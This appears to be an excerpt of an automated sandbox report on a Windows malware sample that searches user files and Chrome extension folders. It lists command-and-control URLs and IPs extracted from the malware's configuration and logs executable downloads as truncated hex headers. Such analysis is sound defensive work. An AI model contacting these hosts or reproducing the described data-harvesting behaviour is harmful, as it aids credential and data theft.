Source: Binary string: gdi32.pdb source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: msasn1.pdb source: firefox.exe, 00000021.00000003.3397835645.00000169CD8A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xWindows.Security.Integrity.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nsi.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: firefox.exe, 00000021.00000003.3413206321.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xOneCoreUAPCommonProxyStub.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: UxTheme.pdb@ source: firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: winrnr.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: imm32.pdb source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413206321.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 270MB

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor URLs: http://85.28.47.31silence
Source: Malware configuration extractor IPs: 185.215.113.19
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 33
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.6:53395 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.6:54028 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.6:58872 -> 1.1.1.1:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 